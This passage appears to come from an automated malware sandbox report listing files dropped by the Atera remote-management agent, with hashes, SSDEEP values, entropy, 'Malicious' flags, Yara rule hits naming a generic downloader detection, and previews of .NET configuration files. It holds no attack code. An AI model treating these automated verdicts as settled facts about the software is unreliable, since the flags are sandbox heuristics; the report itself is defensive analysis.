                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):215080
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.030238846720031
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:Z1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7sw:AIzm6pOIgvr7p
                                                                                                                                                                                                                                                                                              MD5:F4E5A12570C546887839144E366482A8
                                                                                                                                                                                                                                                                                              SHA1:44462E129DD9DDF05623BBE3437FE64821F14787
                                                                                                                                                                                                                                                                                              SHA-256:3CA6DCCBC420E9100F3BC9B3BDBEA6973816C62B8DC2A81FF22F6E842C10DD35
                                                                                                                                                                                                                                                                                              SHA-512:8AD5A8B20B3EA96BB5044543D4556AEC224BF343023EB4C5CDD605EC8CA5A7E9BE329E71D9421268CD7FD4B0CA476C102AE0E4F6AE002363B15888D7DAA9E7B3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):398888
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1341588755904635
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:ZjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvnt:Z+e55LgIkTmyAAfTnMLvnt
                                                                                                                                                                                                                                                                                              MD5:0F550F1F92AA94E930A6C68D805699C7
                                                                                                                                                                                                                                                                                              SHA1:BFDAAE802A1479E01C0FB5165B7ECC951F82117F
                                                                                                                                                                                                                                                                                              SHA-256:9DD7542BEFEDA3649F61AFAB2D82C1D8B26115F41E864A2F8264E709FC91812D
                                                                                                                                                                                                                                                                                              SHA-512:5567706E01652BF7C7F56FA3FA49547D130CDE23AEE116E706F2868079011C5B263E5CC604B5662E1090B7AB2ABC205024DAAE484C836D6882E7464FBDA85E06
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960676959152574
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:NBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUgA:NBjk38WuBcAbwoA/BkjSHXP36RMGJA
                                                                                                                                                                                                                                                                                              MD5:E9108FCACB095ED2823F69BAA9ED1D93
                                                                                                                                                                                                                                                                                              SHA1:EE25D1E059F0CE1ADDD5E4B7A03853B36C884400
                                                                                                                                                                                                                                                                                              SHA-256:0BA7E4BEDA6C8C7A6B877FC2B7E0B6F8A8F507658FCA54A912F8E45554C182D6
                                                                                                                                                                                                                                                                                              SHA-512:21AED55252C9274266EB2CAF51D5B92762071E0B332CC5DDE7CC32C1782FA81B1140BD0F635016C6FEC0C4A172109825CF6E5EE5A93C6F0B1863CDCEE053AA4F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):154664
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.990887534367274
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:s4wM6OoRu7qywKsqxhDuPr5xJMnOfMAw3TkHjt0QQNOWIkHUsz72otHA3Qe:s4wZywKn/U5xEwKIk0W1e
                                                                                                                                                                                                                                                                                              MD5:82B94D333BAF35B94599C989A1A8EECA
                                                                                                                                                                                                                                                                                              SHA1:5DF13E96606E67B4D5275D3BB91B9A95AFD31617
                                                                                                                                                                                                                                                                                              SHA-256:BB8180CBDF1CDC7E7EBC4D23DAE6224F05145EA2605BF76D18D49983F4756E04
                                                                                                                                                                                                                                                                                              SHA-512:1EBBAC94643FC4D3A74230A006478F1D7DD6A8BA8F8608D7B69DE5C92E9BD3182CDB4183345C73B48B3752D04C060CE42ADB7E3A8C1A9424ED47364E4FE837E7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22056
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.669568565502546
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:JrMdp9yXOfPfAxR5zwWvYW8aznNyb8E9VF6IYijSJIVxAPc:JrMcXP64LEpYi60F
                                                                                                                                                                                                                                                                                              MD5:E5E7EB1598B17C8373BC0F0C5F937840
                                                                                                                                                                                                                                                                                              SHA1:469D0F5A911EF1C80FC0E328F9E76A34583BB31D
                                                                                                                                                                                                                                                                                              SHA-256:B883AFE3544A92BD429BBA8057F7C4AEAD683739E91F2CCA8F8147FE3327428B
                                                                                                                                                                                                                                                                                              SHA-512:B2971B3D64578564F9A9DEC3616F85570C81AF65C596BA94A21578611C0DD3A834F5964636C4A10264D4A29B2EC2C74BED768DB4992CA2A43313025641BA932D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):420392
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.109465884923044
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:q5douWvsWkOfjL/MEd6/7vfA8SCW1nFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFr:qpjblhW1L
                                                                                                                                                                                                                                                                                              MD5:EA5C50754B3A11BE9489EAB04AB81031
                                                                                                                                                                                                                                                                                              SHA1:A46386934C9D629956668F87740E4DA4147E07B7
                                                                                                                                                                                                                                                                                              SHA-256:08A76A996C91AB785E4142621CDC3254B47175EC3A33FC8C3513ED8DFF554958
                                                                                                                                                                                                                                                                                              SHA-512:AAA3B07127EEB6F2E058C6864248863D4BAA83CD4683791AB82C507E57EA2EEF6FD78C1FA29640CDF583EC12F8C13668F4D8DE79BF4387711D7EDBD28B826344
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64040
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.266365839467569
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:PYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zw:PKC9niwOepJ6TJPeb6NIUFg76Kzw
                                                                                                                                                                                                                                                                                              MD5:55DD167763EB9C4FE8709C21FDCFECD9
                                                                                                                                                                                                                                                                                              SHA1:A634B0897ED97161B62FF14B15B9AF9FBB760C7E
                                                                                                                                                                                                                                                                                              SHA-256:970011EE897E5BD415A4D70641B6ACC58F0656CB7F87E7C529B90640E1068C81
                                                                                                                                                                                                                                                                                              SHA-512:9F65B7AA10E046D0A64C67052DA8814BCE027239960B8768FF69922B90938299815A4D9D024CFABA296EC0EE2C9DC1FB2B6F8BAE9601235BB7BC34B6237C886F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):142376
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.160369825867044
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:RUGrszKKLBFa9DvrJGeesIf3afNs2AldfIlqI:IBFd3/aFs2p
                                                                                                                                                                                                                                                                                              MD5:817FAA0EF87B090956DC66ABE717C2F8
                                                                                                                                                                                                                                                                                              SHA1:80C57CE1204908B0CD8BF696A9E54C55BF1C018B
                                                                                                                                                                                                                                                                                              SHA-256:0EC0A4222FFAD1F56182B48B6DC62906A3354912B52CB8B5974D5DA6D0AFFF2E
                                                                                                                                                                                                                                                                                              SHA-512:1B04F84E46D7C3894FE9437F3F1E35560FDA773D60413D5F607DE08409DAFBE241249145EC056871CA55B425E8CC39AD44F56F0D1D517149A902019902E7F6C5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):110120
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.510600631729483
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:kPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/Yb76dH:kWw0SUUKBM8aOUiiGw7qa9tK/Yby
                                                                                                                                                                                                                                                                                              MD5:0325D05CE325053B86538BAE3677D036
                                                                                                                                                                                                                                                                                              SHA1:F6BD3CE0E63F1502FCA3568F9A2FE8EE610A02F3
                                                                                                                                                                                                                                                                                              SHA-256:E4A7BFBAB82F5632AF35A88392FD163F2B994FDF6898BE36166CF59D1DDDD32E
                                                                                                                                                                                                                                                                                              SHA-512:0E7ABF0C24153D4924733DD6A6B867C68439FF58DB0DCB09A11033CDF9D93317C06876971936A35244E0BD4A751356781BA23F7B9F8BBC82C3EE27ED9ED829B1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17960
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.6730203845205205
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:gh06sbbVVPWU2WYNNyb8E9VF6IYijSJIVxeBZcyP:gy9gpEpYi60AZn
                                                                                                                                                                                                                                                                                              MD5:43D2A25330C937DBE092E763C728857F
                                                                                                                                                                                                                                                                                              SHA1:FACA5B0028E066D20DD60BFC381E64183BD1EAE9
                                                                                                                                                                                                                                                                                              SHA-256:7D38BCDD5A122941DA48F3B3464ED2BB2B3DE6AFCDAC951FBAFE827CA3A179D6
                                                                                                                                                                                                                                                                                              SHA-512:43A7F23EB47AB06C231447619E71764853C7F47AC13071A5F1237D477CD5AFF4DD413EE8F60BBD21C5D96E3DD29C494802E71FE69B836FF679449083BA6C6E0E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):19496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.523503501017087
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:TyPa16oAL4D+wW9IWmDIW4IWYDa9Nyb8E9VF6IYijSJIVxFXao3O:TWs6oqDjADKeDa5EpYi60t3O
                                                                                                                                                                                                                                                                                              MD5:5CCE0A003A3B4E3FCB05AD331737A629
                                                                                                                                                                                                                                                                                              SHA1:F227F3D440B87FF6CA1DFCB05DB858422B6FB586
                                                                                                                                                                                                                                                                                              SHA-256:98195B6ADD5D1B7357CF9CEACBC47180934050CD1F1CDC30D728CAF933F1F94D
                                                                                                                                                                                                                                                                                              SHA-512:4A210A5ED4F406D7350DDBB9EE969F93F1CA3168A8034661927297319D778FEF95434E4C6D8981FDD17573C42DE013F7C765A39D9EFF8557932547DE47061C6E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41512
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.408720053739074
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:ejfAw5tisE7Mkvwtwq6uUQ/B0X5tl9wCVjkz3pVS3Upoztj9FgNyb8E9VF6IYij/:eksE74GX7nwOa5VS2ozd9FYEpYi60F
                                                                                                                                                                                                                                                                                              MD5:7ADB4990E3417E540A8BA94265B3BB05
                                                                                                                                                                                                                                                                                              SHA1:DC9040A3E3DBA544C34ECF8B709C41479390061C
                                                                                                                                                                                                                                                                                              SHA-256:776D914F78177BE94DBCAC47AD3E9D97D9E31208F474A828540EE60E695C3577
                                                                                                                                                                                                                                                                                              SHA-512:8EAEBE99366B7428281B1C0D87030C17E726E8B5D239F00DD29FFAA6F95C27FF443206488B6D08108663B6290F5421CD2BE34BA978BA6E4D94AA2F4CF197761A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1547
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.008195800038022
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FVruH2/+mV0PH2/+w39y:3sIk7O7RgdjdgFSagFgg+msg+w3w
                                                                                                                                                                                                                                                                                              MD5:029F543956E8B235A70112C77912150A
                                                                                                                                                                                                                                                                                              SHA1:8F8916C78D9D3E5F92C37BDD39D34CD3B79BECA6
                                                                                                                                                                                                                                                                                              SHA-256:33720B1985FE3F07F13744963085FA641F452EC393C3C8987A6023D0BC493BD1
                                                                                                                                                                                                                                                                                              SHA-512:CF6EF25E7FD7E0B04A4F76B1552621874DAAA43838D0C028E62D1AABFFCD57AC7086A174BE9D5AF283DE8E8F09B5B40505478978102A1D8351681532B3828A38
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):78888
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.073747946605879
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:zEgQIe8mLShsE0EGB3GsoTcvlYksQf761:zleyi5ErsoTcvPsQfe
                                                                                                                                                                                                                                                                                              MD5:41697838D5D0D8EDA1411C981C9B29A5
                                                                                                                                                                                                                                                                                              SHA1:6895F922F9EAE7C86C44A123F68BA4047C8E84C2
                                                                                                                                                                                                                                                                                              SHA-256:308EB6E0401D6C30DCB17A1740A9F83197E1A82EE3B885BEBE9D840B6110DC18
                                                                                                                                                                                                                                                                                              SHA-512:C6031B6038D9EBF5A623C482EE034473D54001EF233AE4DBDE9F6AF5C52BDA29FC517B7959D4FCDFD0379AE89C4B60E5E10C6DB434A2B9E44918E4B266AE26AE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):953
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9874198404771155
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JduPF7NhOXrRH2/dVxlPH2/FVQ7uH2/F9y:327O7RgdjdgFSagFw
                                                                                                                                                                                                                                                                                              MD5:8C9F9547ABA4CD154FAA858695986C4E
                                                                                                                                                                                                                                                                                              SHA1:667630B8AEA31C20C20EE569983B73028F0DBA21
                                                                                                                                                                                                                                                                                              SHA-256:7DE06E53089587194D3669B5F2050B363CC2AC1BC66F0537EC4D7AD94357D46F
                                                                                                                                                                                                                                                                                              SHA-512:C305E923A197E2C39813D423FE50D94F183E932BCC66DBEE5667AD7F4083254D50510E35ED3603555FEB4C42F580C8A1FA3D1568CC7305D22B79AB406607F836
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):350760
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.90589251015886
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:4O11JSb/jb5LEH8VAynnnnnnnnnnnnnnn82Bw:e5W
                                                                                                                                                                                                                                                                                              MD5:7A4CBB0228E97071A39E075AC95186E2
                                                                                                                                                                                                                                                                                              SHA1:3711A1F3F76428AEDC2647532575C37A1629AC2A
                                                                                                                                                                                                                                                                                              SHA-256:373437D726DD953113E193FF4028C77AA462BC8EAB53E4F770889746652C3958
                                                                                                                                                                                                                                                                                              SHA-512:EBD2DBE33B6346D020BCE651664B903D31BAFBA4968F8EE8983E38C9EFF8EEA928364D7406945258CF35E805580B125160D061510F16F95900C3CFB276F11EC0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1786
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.998101412964689
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3sIk7O7RgdjdgFSagFgg+msg+w3Zg+wBw:8TizwzH
                                                                                                                                                                                                                                                                                              MD5:DACBD4EDD0163701F63ADA3E81D8540E
                                                                                                                                                                                                                                                                                              SHA1:219647896B3575AA8A07E2903D50304919C27CA7
                                                                                                                                                                                                                                                                                              SHA-256:DF0FBC7B2A5449681549C81B7EB77B2CE8D3C0C62244C39442A73A0291124BCB
                                                                                                                                                                                                                                                                                              SHA-512:5C725DEE661DF9FFE6D3723606FAF98F0B16094DAFC011CDE062436B351671E952A2C6CFA218E08785DBC2E69E97EC8218E1447683C1450C5BF9CCDC75C2EA73
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):350760
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.90589251015886
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:4O11JSb/jb5LEH8VAynnnnnnnnnnnnnnn82Bw:e5W
                                                                                                                                                                                                                                                                                              MD5:7A4CBB0228E97071A39E075AC95186E2
                                                                                                                                                                                                                                                                                              SHA1:3711A1F3F76428AEDC2647532575C37A1629AC2A
                                                                                                                                                                                                                                                                                              SHA-256:373437D726DD953113E193FF4028C77AA462BC8EAB53E4F770889746652C3958
                                                                                                                                                                                                                                                                                              SHA-512:EBD2DBE33B6346D020BCE651664B903D31BAFBA4968F8EE8983E38C9EFF8EEA928364D7406945258CF35E805580B125160D061510F16F95900C3CFB276F11EC0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1786
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.998101412964689
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3sIk7O7RgdjdgFSagFgg+msg+w3Zg+wBw:8TizwzH
                                                                                                                                                                                                                                                                                              MD5:DACBD4EDD0163701F63ADA3E81D8540E
                                                                                                                                                                                                                                                                                              SHA1:219647896B3575AA8A07E2903D50304919C27CA7
                                                                                                                                                                                                                                                                                              SHA-256:DF0FBC7B2A5449681549C81B7EB77B2CE8D3C0C62244C39442A73A0291124BCB
                                                                                                                                                                                                                                                                                              SHA-512:5C725DEE661DF9FFE6D3723606FAF98F0B16094DAFC011CDE062436B351671E952A2C6CFA218E08785DBC2E69E97EC8218E1447683C1450C5BF9CCDC75C2EA73
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss
